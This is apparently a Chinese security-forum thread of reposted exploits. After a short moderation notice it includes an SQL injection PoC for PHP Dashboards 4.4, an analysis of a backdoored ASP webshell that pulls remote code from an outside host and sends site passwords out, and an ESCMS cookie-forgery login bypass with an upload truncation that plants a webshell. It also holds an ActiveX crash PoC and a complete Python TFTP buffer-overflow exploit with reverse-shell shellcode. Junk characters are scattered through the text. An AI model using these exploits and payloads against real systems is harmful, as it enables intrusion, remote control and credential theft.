最近看过此主题的会员

返回列表 发帖

灌水警告!!

可能因为近日论坛表情更新,所以部分论坛会员运用纯表情回复贴或一些无意义回复,这里予以灌水删帖处理!; e6 S) n5 ~$ h/ K- `
0 o+ B, D% t7 i* t
纯表情回复是对帖子作者的作品不尊重。所以请各位尊重发帖人,下不为例~~~
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

收到
http://chenming5869.blog.163.com/
百分百付出的汗水,百分百走向成功

TOP

楼上木JJ

TOP

还有一些回复奇诡的也该打压下

TOP

回复 4# 笨蛋》活该 ) ?* x# f' J& y2 e

' {( b2 j  X  [- a3 r/ _( `0 Y& N& g+ `- u. R
   是的 比如3楼

TOP

泪流满面

TOP

PHP Dashboards NEW 4.4 - SQL Injection
# # # # #
. Z. r' g9 L" V( A: y6 u' h# Exploit Title: PHP Dashboards NEW 4.4 - SQL Injection
* \0 E5 \) A8 O% g# Dork: N/A
2 w" B1 j( s, `4 T# Date: 11.09.20174 a: u2 G3 W8 ^
# Vendor Homepage: http://dataninja.biz// v. U6 I! ~$ h$ R5 w% C) \7 W2 C( s! e
# Software Link: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871
; ?  H) l% m" I! [( x# Demo: http://phpdashboardv4.dataninja.biz/
1 W5 F+ i: f. d0 a# |# Version: 4.4
* Y, N  e5 w; G# z# Category: Webapps, a6 w& X. v5 b/ O; y+ g% |
# Tested on: WiN7_x64/KaLiLinuX_x648 m) {8 E4 z1 I" _% ~# T$ K
# CVE: N/A
# x# _" ]2 |- _. _+ b* O' s* E# # # # #" T2 I- D, w% C( L
# Exploit Author: Ihsan Sencan
4 z- u2 ~( i" Z! B5 u# Author Web: http://ihsan.net
6 i$ R, d; L. l" X5 S- x' ?8 U# Author Social: @ihsansencan
3 t2 g/ d3 X7 ]( V" [( Y' q1 ?# j# # # # #
& U/ Z# C/ ^1 R8 A# O- _9 q4 e) y2 t# Description:) ^0 F6 [- g. k6 ]
# The vulnerability allows an attacker to inject sql commands....
8 m9 T* v! h0 Q, ?; S0 u- q( E#
9 I! K6 |) u2 p# Proof of Concept:
7 \8 r& S; ?# ]( W+ o( r; K# Y* k#
" _/ d" B3 o! f& s/ Z. ]1 y# http://localhost/[PATH]/php/share/save.php?dashID=[SQL]
) L: K/ ^# g, {" T" E9 i2 @6 x# 8 }& g; c6 j4 ?' D
# http://localhost/[PATH]/php/save/db.php?dashID=[SQL]
) o/ b5 M7 ^& @9 x  j* Q: \( r2 L' Q' _  o& y2 V  L( `
# % v, K9 C) G' V
# Etc..
/ e6 p! K8 I0 y) u2 \& w" d# # # # #/ @- f) t5 i1 d2 K1 ]
  E1 C( b' F, p# C5 |  m1 a, `1 A# e
  r7 M% h* `1 n

$ v) L# K2 M, o( _; u" q
9 P7 r% ^0 B/ G% o1 i
0 J. \& m4 G0 I; V- T$ Y* C2 a1 h0 I, G- v
# G6 Z) ~5 Q3 G# r+ S8 ]
  f/ b1 ]: o, b( U7 q

) R* X: K6 F  `( ^' ~3 {0 B; f% I; f1 g# ~1 a1 H8 w9 u$ w

4 O* L( W2 }( N! l4 X8 A# _+ y9 [, m! g4 _. S

: s7 y: P0 D& i" n* J& o
2 D5 t* I% a& h+ l
( A: i/ q4 h+ }( ^" N' }: E
* v& I2 Q. }! w" ~2 f4 ]
9 _# ?7 {' u9 ]( `
6 D, T$ d0 b1 t! ?4 Q公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

[转载]十三WEBSHELL终结版后men的发现之旅
[转载]十三WEBSHELL终结版后men的发现之旅1 A9 A6 `% I2 t5 ]' `2 |1 `$ k
作者:TheLostMind来源:绝色笔记自从上次从网上找了个WebShell管理网站,后来发现有*, 被人挂马了,数据库被破坏了,至今还没修复……所以对别人的WebShell格外小心。网上找了个十三WEBSHELL终结版生成器,如图下面我们来生成一个ASP WebShell生成后的WebShell是加密的这个解密直接用工具了,就不详述,解密后代码如图132.JPG看看代码, 还是加密的从代码中很容易可以看到他的解密函数是SinfoEn那么我们就来解密出来,解密的代码已经有人写出来了。下面是冰点极限论坛上贴出来的解密代码:===============================decode.asp======================================<%Pos=2 '解密固定值Function Fun(ShiSanObjstr)ShiSanObjstr=Replace(ShiSanObjstr,"|","""")For ShiSanI=1 To Len(ShiSanObjstr)If Mid(ShiSanObjstr,ShiSanI,1)<>"!" ThenShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&amp;ShiSanNewStrElseShiSanNewStr=vbCrLf&amp;ShiSanNewStrEnd IfNextFun = ShiSanNewStrEnd FunctionFunction SinfoEn(ObjStr,ObjPos)ObjStr=Replace(ObjStr,"~","""")NewStr=Split(ObjStr,"`")For i=0 To UBound(NewStr)SinfoEn=SinfoEn&amp;EnCode(NewStr(i),ObjPos)&amp;vbCrLfNextSinfoEn=Left(SinfoEn,Len(SinfoEn)-2)End FunctionFunction EnCode(ObjStr,ObjPos)Dim NewStr,TmpStr,i,LenStrLenStr=Len(ObjStr)For i=0 To Int(LenStr/ObjPos)-1TmpStr=Mid(ObjStr,i*ObjPos+1,ObjPos)&amp;TmpStrNextEnCode=TmpStr&amp;Right(ObjStr,LenStr Mod ObjPos)End Functiondata=request.form("x")if data="" then data="nothing"response.write "<form method='post'>"response.write "<textarea name='x' cols='80' rows='30'>"response.write Server.HTMLEncode(SinfoEn(data,Pos))response.write "</textarea>"response.write "<input type='submit' name='Submit1' value=' 提交 '>"response.write "<input type='reset' name='Submit32' value=' 重置 '>"response.write "</form>"%>===============================end===========================================现在就直接解密,解密后的代码如133.jpg按照普通的搜索*的方法,当然是搜索如HTTP之类的代码,我搜索了一遍,没有发现可疑的代码。搜索关键子:UserPass看看它的密码验证代码:====================================================================================if session("web2a2dmin")<>UserPass thenif request.form("pass")<>"" thenif Serinf(request.form("pass"),pn)=UserPass thensession("web2a2dmin")=UserPassresponse.redirect urlelserrs"非法登录"end ifelsesi="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><a href='"&amp;SiteURL&amp;"' target='_blank'>"&amp;mname&amp;"</a><hr><form action='"&amp;url&amp;"' method='post'>密码:<input name='pass' type='password' size='22'> <input type='submit' value='登录'></form><hr>"&amp;Copyright&amp;"</div> </center>"RRS sIend ifresponse.end=======================================================================================密码用Serinf函数加密然后进行验证,代码正常,没有可疑的迹象我们在搜索Serinf,看到如下代码:========================================================================================if session("serinfo")=false thenSererInf "1ll4":session("serinfo")=trueelseif action="getTerminalInfo" thenSererInf "1ll4"end ifend if========================================================================================看到这里就觉得有点奇怪了,搜索session("serinfo"),可以发现session("serinfo") 在前面是没有定义的,那肯定是false了,那么我们就来看看SererInf()这个函数,搜索SererInf,找到如下代码:============================================================================================function SererInf(inf)on error resume nextSet theserver=Server.createobject(Sot(13,0))theserver.open "GET",right(sot(13,0),4)&amp;chr(60-pos)&amp;"/"&amp;chr(pos+45)&amp;inf&amp;chr(46)&amp;mid(sot(4,0),2,1)&amp;chr(109+pos)&amp;right(Sot(6,0),1)&amp;chr(47)&amp;right(sot(1,0),1),falsetheserver.send()if theserver.readystate<>4 thenexit functionend ifexecute(theserver.responseText)set theserver=nothingif err.number<>0 thenerr.Clearend ifend function======================================================================================看到这里就很明白了,这就是*,那么我们的*到底是怎么样的呢?还是把下面这句解密开来看看=======================================================================================right(sot(13,0),4)&amp;chr(60-pos)&amp;"/"&amp;chr(pos+45)&amp;inf&amp;chr(46)&amp;mid(sot(4,0),2,1)&amp;chr(109+pos)&amp;right(Sot(6,0),1)&amp;chr(47)&amp;right(sot(1,0),1)==========================================================================================继续搜索sot,发现sot数组的值如下:========================================================================================Sot(13,0) = "Microsoft.XMLHTTP"Sot(4,0) = "Scripting.Dictionary"Sot(6,0) = "Adodb.Stream"Sot(1,0) = "wscript.shell"===========================================================================================继续上查,可以看到pos=2,那么我们现在就可以把上面的这段用函数加密了的代码解密出来了,很简单。right(sot(13,0),4)=httpchr(60-pos)=:chr(pos+45)=/chr(46)=.mid(sot(4,0),2,1)=cchr(109+pos)=oright(Sot(6,0),1)=mchr(47)=/right(sot(1,0),1)=l隐藏得的确很巧妙!解密的代码如下:==========================================================================================http://1ll4.com/l=========================================================================================看到这里是不是觉得很奇怪?怎么*代码不完整呢?不急,我们再来打开http://1ll4.com/l这个网址看个究竟。打开http://1ll4.com/l页面,查看源文件,代码如下:==========================================================================================Serurl="http://1ll4.com/1/?jpg=8&amp;u="&amp;Serveru&amp;"&amp;p="&amp;UserPassSet theserver=Server.createobject(Sot(13,0))theserver.open "GET",Serurl,falsetheserver.send()=========================================================================================现在看到这里就完整了,参数Serveru=request.servervariables(""http_host"")&amp;url,即网站的完整路径,参数UserPass当然就是密码了,虽然是加密的,不过可以解密!到这里,WebShell里面的*就完全显露出来了,接下来的事情当然是去*!我这里修改了这个WebShell,除去了*,增加了部分功能,改善了部分功能,不知道放到哪里下载,大家可以到我的BLOG上看:http://hi.baidu.com/lostmind从代码中还可以看到,这个提交没有COOKIE验证,那么我们就可以直接提交代码了,可以直接找个HTTP破解器,把地址和参数写进去,然后DOS它一把!当然大家不要D它了,写个WebShell也不容易,原谅他吧!同时也提醒朋友们都留心,别人的东西还是仔细看看。$ f4 F/ d; l1 x$ ^( ]& U, v/ Z
( E( }/ g% [- ]8 b2 N# m* u! ]. y
- |5 ~% I& ?$ Y- `
6 G2 ?; V+ {, l/ p
) y4 |+ f6 s/ {' e0 `$ \% `
% Y  o& V  w2 O  Z" B5 Z
  {) F, E, q" }7 ~7 |
. B/ e5 X) l$ V( Y5 v* z4 s

  o* _+ V6 Q9 _! o3 Y, W, c9 [; l- Y
) C  N2 _( A3 I8 v8 A

7 x6 s# _, w- s/ `; h. }8 ^2 f1 X) Q" \6 |6 `1 t4 {& L
$ c/ S! n$ K5 h
+ g9 @6 u  W1 k* Q! B

# A# g4 I/ B: i; ?, u, M3 i, v  p/ j! i: x8 I- K

4 l" B/ B" Y6 x3 b0 o$ N8 M
9 o0 ~. r; ^' O+ q公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ESCMS cookies欺骗0day
版本:ESCMS V1.0 SP1 Build 1125& v/ ?6 ]' t" H  d7 O
后台登陆验证是通过admin/check.asp实现的,看代码

! ]; K0 {! z9 U+ V# E% h
4 h: D, r* B  M5 D  q1 U! Y<%
7 I9 {% Q7 T: L% mif Request.cookies(CookiesKey)("ES_admin")="" then
  K" Y/ f8 o- _' j! z; ?/ r'注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空
( A) X0 k' V6 f. \'CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2* C7 C& J  r$ x/ M% i& B- R
Call Err_Show()$ j1 [  U5 ?3 O; K# z: S9 B
Response.End()9 ]: d& S, v' g& {
End if/ p4 ^# t6 J( k1 y$ ]: M0 S
......0 g) }& N2 [3 Y: V9 x; s5 V" {
%>
+ F  H7 h$ z8 E/ v2 ?. V" F首先我们打开http://sitedir.com.cn/admin/es_index.html

4 q/ W1 ~& c2 y! b) B) x" r1 K' ?
3 U* m4 ]0 Q8 E5 e8 c: _$ O

3 q7 Z7 t6 H3 n0 P$ E. G: j
然后在COOKIE结尾加上
  @- m. M8 u5 u0 d  ^; S5 Y; ESCMS$_SP2=ES_admin=st0p;
$ ~3 u6 o  P$ P7 n, P8 x
修改,然后刷新
5 @$ K: k$ f. B. p& _0 V3 ^
进后台了嘎..

" X* J5 Q3 S+ j1 r( b
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL,看代码

/ m8 u: d% {0 [+ }
......
4 c' M4 N3 ]) q$ t. j# z$ r. HformPath=upload.form("filepath") '此处没有过滤. j! w, a# A7 w, A% R* u
if formPath="" then: L" S9 e# W3 ?, h
formPath="../Upfile"- A+ j# `* K& u) Y% S- P9 L
end if  t$ q6 O/ g% o9 ~+ W. V! L4 }
Dim formPath1
+ D) Y, R5 O/ v" Y4 Y' xformPath1="Upfile/"
  [6 s- p; G+ D& m'在目录后加(/)
/ s  ~7 h% T- O( u9 g8 X6 B! c0 rif right(formPath,1)<>"/" then , ?# c; T0 }) W9 a
formPath=formPath&amp;"/"; Q4 h2 W$ u; h
end if
6 j- y/ ^/ O9 d) O% _& Vfor each formName in upload.file '列出所有上传了的文件* k7 }( X% I! j6 l! A! Q, V
set file=upload.file(formName) '生成一个文件对象' p. G4 L( i" O) O) J/ K: k
if file.filesize<100 then
" H( B: Q2 T# w. iresponse.write "请先选择你要上传的图片! [ <a href=# onclick=history.go(-1)>请重新上传</a> ]"
. x) k/ F* a* ~response.end
4 Y% q$ X# e" f8 l* r. _5 `end if
6 Z0 W4 y8 ^: X! h& X1 j
fileExt=lcase(file.FileExt)
, u. j1 U2 o* J$ n7 {- s1 w, a1 Rif CheckFileExt(fileEXT)=false then4 v  \2 W: D  g4 Z; B: f
response.write "文件格式不正确! [ <a href=# onclick=history.go(-1)>请重新上传</a> ]"! I% g0 m6 X3 N( t+ i; j9 d
response.end+ {" @' g/ w* Y3 J; K
end if

4 L( Q/ V! k3 L3 @( a4 U
'randomize# m+ z/ M4 Z) Y" I1 r
ranNum=int(90000*rnd)+10000
* w! X2 K% G+ z' TDim tempname,temppath( W0 Q) B) G  K# X* J
tempname=year(now)&amp;month(now)&amp;day(now)&amp;hour(now)&amp;minute(now)&amp;second(now)&amp;ranNum&amp;"."&amp;fileExt
% m# Z; ]2 H8 _0 M8 i3 X" {9 Atemppath=formPath1&amp;tempname2 t8 _6 N5 t* t! h; z
filename=formPath&amp;tempname7 ]8 v( b6 G; ^' o3 q# J' v: C
if file.FileSize>0 then '如果 FileSize > 0 说明有文件数据
4 A7 K! f* f5 [6 L% `; Iresult=file.SaveToFile(Server.mappath(filename)) '保存文件,这里地址就会变成我们截断的SHELL名称9 D/ w. G- k* o6 m  b
......

& R2 B. l$ C! P! @8 _, |9 L
& f! o* ^! E$ K$ w% D9 m% \
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
, f/ I$ y& }# X  |5 [2 B
成功了,shell地址为http://www.sitedir.com.cn/admin/diy.asp1 W/ \" b1 {2 d) U/ Y& i, p
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
8 r: W7 D0 H0 \5 b) X1 f
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了,因为此版本用session来验证登陆…
! J! g) k8 U! Z
# M9 p* H7 V% N. s( X

; u/ t3 w4 }( C1 l: ?* e; q/ n. D% p1 ]" Q0 w) x

) P4 d0 N" x. [
) q7 N0 Z, y. W2 g# T5 R+ L
- }/ S/ j4 }) \+ @/ t& N/ [- I1 p7 @
6 _5 [8 l! Z( v+ W# s% W* k3 t  u: Z3 x8 H  q2 V

! X4 P) ^# L$ t1 m5 I- ~  b  }; s9 ^. s1 y; W
0 p  _" A  F  e* v3 C7 M  N

; n( J( Y' b: `% j8 c( I' t' u7 Y7 _' }% D" E

* T4 o+ M! m+ D- M  J2 @6 y: `# E9 y* f) M5 r( q4 K7 O& ]) `

0 s; b* h' Q% z$ S( m  {0 B
' Z  l% Z/ T4 ^+ L/ U
* A8 C/ D) |, o' x
$ S( t& G& H) H' v- ^# T! E  q. V. o2 z! h
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

PDF Viewer Component ActiveX DoS
Title : PDF Viewer Component ActiveX DoS
5 A# s: Z; u" c& }7 q. ZAuther : Senator of Pirates
' K6 }; y: a+ |- rE-Mail : Senator.of.Pirates.team@gmail.com
* z9 ^5 H& T7 H4 @/ p6 }( d5 MFaceBook : FaceBook.Com/SenatorofPirates, D0 ]! W, V, Y8 G3 M" U1 s5 b
Software link : http://www.ocxt.com/download/PDFViewerSetup.exe4 Q; s% h2 D) c5 ~4 d
Date : 05/02/2012
% u" o; e; N( D1 M( g+ }) TTested : Windows Xp SP3 EN
( k" P+ p, E/ E1 R* geax=00000000 ebx=00000001 ecx=01800990 edx=01800990 esi=10150cd0 edi=000c5f6c: l2 ~0 i5 {# T& ?  w
eip=017a7a3e esp=0013c754 ebp=0013c758 iopl=0         nv up ei ng nz na po nc8 ~* T2 f! x+ C3 [# Q
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210282% e$ c+ K) v, ?" }' g. V5 g
017a7a3e c60000          mov     byte ptr [eax],0           ds:0023:00000000=??) d* p* u( S8 d) i- u' i
0:000> d eax
) v+ n- n$ y& b9 k8 z' H8 ~00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????9 W' m9 b8 V! w) a! [8 i7 h6 e
00000010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
# j2 E) O8 [- b$ ?9 D0 i, R00000020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
# e8 N( H* J7 q+ `  G00000030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
" \; P" D. G" ?- i) U00000040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
6 N' y' v% j. S  r. G$ ^# @" Y00000050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????, o- q& E. e5 N. q
00000060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????2 f/ u( J" I" |$ g
00000070  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
! a! ]4 N0 ?7 _0:000> d ebx
& i) I/ G1 K/ p1 g+ N$ \" `9 t00000001  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????' U5 i9 p7 I. p! q8 @! ~3 x4 i
00000011  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
9 `; o# g7 [; `+ e# b1 K00000021  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
4 S2 \# n- ]2 @& a4 [1 F00000031  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
$ N' B* ?9 z. m' V00000041  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????: n9 Q+ s  D+ T) n/ k+ v
00000051  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????1 V/ t# i, B3 Z1 ^' A. c2 Y; Q3 V
00000061  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
8 A2 n' V. @: ~00000071  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
( R& k% X! t9 @& P7 F<object classid='clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04' id='target' />
4 f) |; A6 ~2 d3 e<script language='vbscript'>
4 `7 z. O5 C$ A. k7 RtargetFile = "C:Program FilesPDFViewerpdfviewer.ocx"
; L3 t; M) R( X( u( {3 O4 uprototype  = "Invoke_Unknown TitlebarText As String"
, J( j, c! t% p& PmemberName = "TitlebarText"% }0 K. Y$ [1 L* `9 n& W
progid     = "PDFViewerLib.PDFViewer"
2 P4 _& V& z9 x* C: [argCount   = 1
! T- Y$ m% b2 h% a$ A  rarg1=String(2068, "A")5 T$ u5 [0 c, S" b
target.TitlebarText = arg13 u& I  |, m. N# a/ a2 [9 Q
</script>                    
# C3 {+ K( n$ Z) A( Y5 B8 Z0 `# e- p( C+ T7 J( s# Q" Z+ @) R

- V: I0 l5 P( U# D( F6 Y) O+ G2 `9 q$ L# s1 o

* B8 J3 m. w) {) q9 |. m! \8 {5 B- R8 `+ B; g2 g- T

$ T# U# ]; T. H8 L% v# g; P4 z0 P- y# h% |
( g$ U0 C7 x  D& Q
+ N3 S  k- T$ {8 M& w& k* Q# [7 p

- j6 Y2 C1 z1 I! a) t1 e
  Z6 M3 c  ~' [+ K+ \3 }: N' v! ~  O9 X6 b* Y/ T
5 P  Y" h& F  m) u9 h8 i
' d, L2 C" h5 g  O
7 s: Z. p/ P: j8 ?5 y
0 v; C2 N) c0 w- }* m* {
; ]" m) q. w% H5 R

( H  r, G& f0 k- }: t9 Y3 f! r% Y% _" p2 J9 B1 ^7 r
! ~5 j" U. ^/ m) r
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

TFTP SERVER V1.4 ST (RRQ Overflow)
#---------------------------------------------------------------------------## e6 s' N1 d+ c2 r! ]0 ^
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow)                               #2 Q& R2 w- H; G
# OS: Windows XP PRO SP3                                                    #$ P4 Z$ o  s; {4 c! p& `) m
# Author: b33f                                                              #
3 n: p; R% ]: s0 f#---------------------------------------------------------------------------#$ U, G% j3 d& _& G1 v
# Smashing the stack for fun and practise...                                #
  t2 {3 t3 M0 ]6 y8 S#                                                                           #
: Q) l( O2 `- G5 _# This tftp service have been pwned extensively:                            #
( c" l7 m5 K) x  |6 Z" t4 g# ^# D6 k# (1) Muts ==> WRQ Overflow                                                 #
0 m3 |8 d6 O+ \#     http://www.exploit-db.com/exploits/5314/                              #2 x& A( G+ a- D5 J1 d4 G6 t& u4 u3 ~0 G
# (2) Molotov ==> WRQ Overflow                                              #* ]7 F/ ^" [5 Z, O# h
#     http://www.exploit-db.com/exploits/10542/                             #7 @! p6 N7 `5 G$ M7 ]" K) x
# (3) tixxDZ ==> ERROR Overflow                                             #
6 W1 A! {  b# h! V" L/ k#     http://www.exploit-db.com/exploits/5563/                              #; V6 F) ]  J% ?. t1 r
#                                                                           #
2 Q6 c% c* a7 n3 W  n& f# Vulnerable software:                                                      #& a" l' Q8 C6 C
# http://www.exploit-db.com/application/5314/                               #$ Z/ B" u3 i: r* k8 o
#---------------------------------------------------------------------------#
( F; E3 e5 a) S8 Q% L# After some simple fuzzing with spike I discovered that sending a Read     #
' C. w$ r8 Q/ q- ^  D; R0 I# Request (RRQ) packet can also trigger a buffer overflow...                #5 Y5 E- H' T' D* h: ~8 f
#---------------------------------------------------------------------------#' Y9 I4 w" K+ j' w
# It might take up to 30 seconds for some reason but the shell does appear  #  X+ r" S$ V8 G
# as expected....                                                           #
* ]" y5 s4 t1 J# D* P* X( `#                                                                           #) W5 M6 b" a: T& S; D0 O
# root@bt:~# nc -lvp 9988                                                   #
: V0 n2 K6 [) P8 B: [( }. t# listening on [any] 9988 ...                                               #
$ S, x" h+ O' W! j0 f# 192.168.111.128: inverse host lookup failed: Unknown server error         #3 H0 z, o+ a$ I- ]
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072        #+ C0 M1 \: B- t
# Microsoft Windows XP [Version 5.1.2600]                                   #
- h; t: e& _1 ?6 k' X. k# (C) Copyright 1985-2001 Microsoft Corp.                                   #
! K6 `3 L9 W* Q3 z  v0 M; v8 x#                                                                           #
$ w9 T/ s4 I- I9 F, y# C:Program FilesTFTPServer>                                              #
$ V6 S' L1 R( f4 M+ M#---------------------------------------------------------------------------#6 V  d, o( F  l. ]2 V" l

7 F- i2 W" I' E* o. C" I: v6 \import socket! u; x! v% D" j! N4 _
import sys& g- e/ c2 B& ^+ d( L' Q# Q/ s

! n; H1 S" j- Z1 W& X- v( o- W! b8 bhost = '192.168.111.128'
1 o* `5 b/ x' z0 M6 S6 Uport = 69
& \  {0 o0 ?* i5 [& u. i" B * K6 ^! X' b+ y0 a5 X
try:
8 F: Y/ _7 B! k$ K0 ]/ z7 r0 v1 _      s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
4 d! f  Z* D. Z      
( j% ]: k6 h1 E8 p* fexcept:
$ D& N  T2 ]! h; l  y      print "socket() failed", k9 N2 P" b$ M
      sys.exit(1)+ A- W$ Q$ @! s
$ R0 ~! I$ d2 F& D1 }
#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b 'x00': J% _3 @/ H: L8 b: o# \: s
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
) M5 e5 e9 b1 T, c' {# Q+ U, Rshell = (
* w% b% C9 \3 I0 \# h) a"xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1"
+ Y) W  s: }4 ]6 ]1 w# m9 z"x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97"
3 |5 y/ v. k5 \7 R, c"xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f"8 C  ~5 J/ a& H+ `' a7 ~# [, w; a
"x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d"
3 U" d& b8 e* g& T7 m"xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92"# W4 y+ ?$ |6 L% b5 @
"xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94"4 O/ x+ v, i9 H) O4 m
"xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50"
. q: X" p; H, ]; v"xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a"
. q8 j3 g1 ~- A  b"xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed"5 y/ S7 O! B+ q9 Y" K
"xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff"
* z4 f: G; d$ U5 p* V"x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec"
( z0 m5 b3 E5 {) q: A' w$ g"xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5"
! {8 H: |4 \6 Y6 g; n"xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0"& Y9 N4 i( ~4 b* p; y
"xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09"
0 V$ [( J. ?& J7 U) D"x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51"9 p  g4 e% S6 q8 c* D
"xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e"
- S; [0 {4 J# H, y" W"x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c"
3 j: q9 c+ j1 L# a- G! d, N1 u4 `"x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06"$ O5 A9 u+ q4 z4 Z5 T
"x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1"
) A5 ]5 s; |+ i  }# J"x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40"
: S1 `5 _2 M( \+ `2 w. ^2 I$ K"xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f": Y* t3 ]( p3 i
"x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22"% m% [7 b( T+ R5 l0 P
"xafx96x42xdfxddx87x26xdfx72xa7x62")$ O8 x" }! Z. }6 U. K% ?7 x; g. v
( Q8 w" m& w" {
#---------------------------------------------------------------------------#
- @1 g: C3 |/ o3 c6 V1 ]# (1) Stage1: 0x00409605 TFTPServer.exe - PPR                               #
6 T2 T+ m( _; N1 ?9 B#             => 3-byte overwrite using the mandatory protocol null-byte.   #: {# K( P5 M2 \6 Q) F1 V2 O; s6 d
# (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump.  #
0 K6 P# m2 G2 g; J1 N# (3) Stage3: jump back 1490-bytes to the beginning of our buffer.          #
9 f) \" K6 L" i" o  e# (4) Stage4: reverse shell port 9988 - size 341                            #
, r7 S* P$ p2 l/ c7 q#---------------------------------------------------------------------------#, I- |2 c, H9 e( h$ E. o6 X2 v
& ?: E% n" a( D; v2 }0 s
stage4 = "x90"*50 + shell2 O( J: @& F$ B0 X! L2 Z+ E
stage3 = "xE9x2ExFAxFFxFF"' C3 J( O5 v: [8 F% f
stage2 = "xEBxF9x90x90"
  Q* `) U6 g4 Y8 K7 _' d' Wstage1 = "x05x96x40"
& x' _! F# I  F' L# A' z , g0 g# G' a( [6 ?' O* |, k
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1* B. {  x9 F8 F  O

3 r+ @1 d' C' g; H! j# W  s+ h; k
) r7 T. v: H# w) H9 p' Z; jmode = "netascii"
& r  h$ Y. ?% ~  t7 P# Yyoulose = "x00x01" + filename + "x00" + mode + "x00"( \; Z/ e' d/ }& S
s.sendto(youlose, (host, port))5 \$ l% D- Q  ]* T7 ~6 e
% c9 x' V; R) U& W+ v, }4 J5 L

, o% G; Z# ]0 j, r
: P6 a# r  S" |. p1 Z) Q* T  v0 _% r( T2 B9 i/ I4 W3 Q
# \1 P2 q0 v6 }9 C

* {7 H' G4 ^0 i2 A' v# L% Z" w
0 e% p0 X" p1 }) z+ q: J7 j8 z$ `9 P5 W/ R3 |( J0 F
7 S7 h) @4 |8 O0 D2 h

' r1 F3 X  y9 R3 V
; l2 W3 u& ]& ^
